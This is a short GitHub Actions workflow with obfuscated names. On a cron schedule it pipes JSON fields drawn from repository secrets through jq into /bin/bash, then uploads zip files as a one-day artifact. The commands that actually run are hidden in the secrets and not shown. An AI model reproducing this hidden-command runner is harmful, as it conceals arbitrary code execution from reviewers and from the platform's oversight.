name: feidangaihuang
on:
  workflow_dispatch:

  schedule:
    - cron: '46 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: feidangaihuang
        env:
          pp55: ${{ secrets.pp55 }}
        run: |
          printf '%s' "$pp55" | jq -r .fx04480 | /bin/bash
          printf '%s' "$o7" | jq -r .o92501 | /bin/bash
          printf '%s' "$xxm623" | jq -r .tated72 | /bin/bash
          echo $kfwaw296 | jq -r .esbyv9696 | /bin/bash
          printf '%s' "$rvhe25663" | jq -r .b6 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: zsRNOh8g
          path: "*.zip"
          retention-days: 1
